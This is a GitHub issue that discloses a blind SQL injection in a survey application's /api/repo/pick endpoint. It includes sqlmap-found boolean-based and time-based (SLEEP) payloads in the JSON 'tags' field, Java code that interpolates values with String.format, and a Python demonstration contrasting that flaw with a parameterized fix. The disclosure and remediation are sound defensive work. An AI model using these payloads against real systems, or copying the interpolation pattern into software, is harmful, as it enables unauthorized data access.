
Blind SQL Injection

Open lcxing opened this issue 2 years ago • 0 comments

There is a blind SQL injection in the API /api/repo/pick. Using sqlmap can find it.

sqlmap identified the following injection point(s) with a total of 21258 HTTP(s) requests:

    Parameter: JSON #4* ((custom) POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: [{"id":"Axd_JDOJc_","repoId":"1585481117291630593","types":["Radio"],"tags":["简单') AND 7642=7642 AND ('TlAO'='TlAO"],"questionsNum":2,"examScore":1}]

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: [{"id":"Axd_JDOJc_","repoId":"1585481117291630593","types":["Radio"],"tags":["简单') AND (SELECT 8522 FROM (SELECT(SLEEP(5)))cRCX) AND ('AezM'='AezM"],"questionsNum":2,"examScore":1}]

The code is in cn.surveyking.server.impl.ProjectServiceImpl#listProject:

    Page<Project> page = pageByQuery(query, Wrappers.<Project>lambdaQuery()
            .like(isNotBlank(query.getName()), Project::getName, query.getName())
            .eq(isNotBlank(query.getParentId()), Project::getParentId, query.getParentId())
            // a null parent id or a parent id of 0 means a top-level directory
            .and(isBlank(query.getParentId()),
                    c -> c.isNull(Project::getParentId).or().eq(Project::getParentId, "0"))
            .eq(query.getMode() != null, Project::getMode, query.getMode())
            // user id is interpolated into the SQL text with String.format
            .exists(String.format(
                    "SELECT 1 FROM t_project_partner t WHERE t.type in (1, 2) AND t.user_id = '%s' AND t.project_id =",
                    SecurityContextUtils.getUserId()))
            .orderByAsc(Project::getPriority, Project::getCreateAt));
    PaginationResponse<ProjectView> result = new PaginationResponse<>(page.getTotal(),

lcxing avatar Oct 28 '22 03:10 lcxing
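The report's injection point is the string values of `tags` (and the pattern in the snippet above is the same one: a value pasted into SQL text with String.format). The script below is an added illustration, not code from SurveyKing; it models the flaw and its fix in Python with an in-memory sqlite3 database. The table name `t_question`, its columns and the sample rows are constructed assumptions and not SurveyKing's schema; the two tag values used as inputs are the report's own boolean-based payload and a variant of it whose arithmetic comparison is false. The vulnerable builder returns different row sets for the two inputs (the differential a boolean-based blind test relies on), while the parameterized builder treats both as literal tag strings and matches nothing.

```python
import sqlite3

# Constructed sample rows: (id, repo_id, type, tag). Not real SurveyKing data.
SAMPLE_ROWS = [
    ("q1", "1585481117291630593", "Radio", "简单"),
    ("q2", "1585481117291630593", "Radio", "困难"),
    ("q3", "1585481117291630593", "Checkbox", "简单"),
]

# Inputs taken from the report: the first makes the injected condition true,
# the second (7642=7643) makes it false. Both are ordinary strings to the API.
TRUE_PAYLOAD = "简单') AND 7642=7642 AND ('TlAO'='TlAO"
FALSE_PAYLOAD = "简单') AND 7642=7643 AND ('TlAO'='TlAO"


def make_db():
    """Create the assumed t_question table in memory and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_question (id TEXT, repo_id TEXT, type TEXT, tag TEXT)")
    conn.executemany("INSERT INTO t_question VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def pick_vulnerable(conn, repo_id, types, tags):
    """Builds the WHERE clause by interpolating request values into SQL text,
    the same shape as the String.format call in the reported code. A quote in
    a tag value ends the string literal and the rest is parsed as SQL."""
    type_list = ", ".join(f"'{t}'" for t in types)
    tag_list = ", ".join(f"'{t}'" for t in tags)
    sql = (
        f"SELECT id FROM t_question WHERE repo_id = '{repo_id}' "
        f"AND type IN ({type_list}) AND tag IN ({tag_list})"
    )
    return [row[0] for row in conn.execute(sql)]


def pick_safe(conn, repo_id, types, tags):
    """Same query with every request value bound as a parameter. The SQL text
    is fixed except for the number of placeholders; values are never parsed."""
    type_marks = ", ".join("?" for _ in types)
    tag_marks = ", ".join("?" for _ in tags)
    sql = (
        f"SELECT id FROM t_question WHERE repo_id = ? "
        f"AND type IN ({type_marks}) AND tag IN ({tag_marks})"
    )
    return [row[0] for row in conn.execute(sql, [repo_id, *types, *tags])]


def blind_differential(pick, conn):
    """True when the true/false payload pair yields different results, i.e. the
    injected condition is being evaluated by the database. A fixed endpoint
    gives the same (empty) answer for both, because neither is a real tag."""
    repo, types = "1585481117291630593", ["Radio"]
    return pick(conn, repo, types, [TRUE_PAYLOAD]) != pick(conn, repo, types, [FALSE_PAYLOAD])


if __name__ == "__main__":
    db = make_db()
    print("vulnerable differential:", blind_differential(pick_vulnerable, db))  # True
    print("parameterized differential:", blind_differential(pick_safe, db))     # False
    print("legitimate lookup:", pick_safe(db, "1585481117291630593", ["Radio"], ["简单"]))
```

The `exists(...)` fragment in the reported snippet should be treated the same way: MyBatis-Plus wrappers accept `{0}`-style placeholders with separate value arguments (check the overloads available in the version SurveyKing pins), so the user id, and the tags in the pick handler, can be bound instead of formatted into the string.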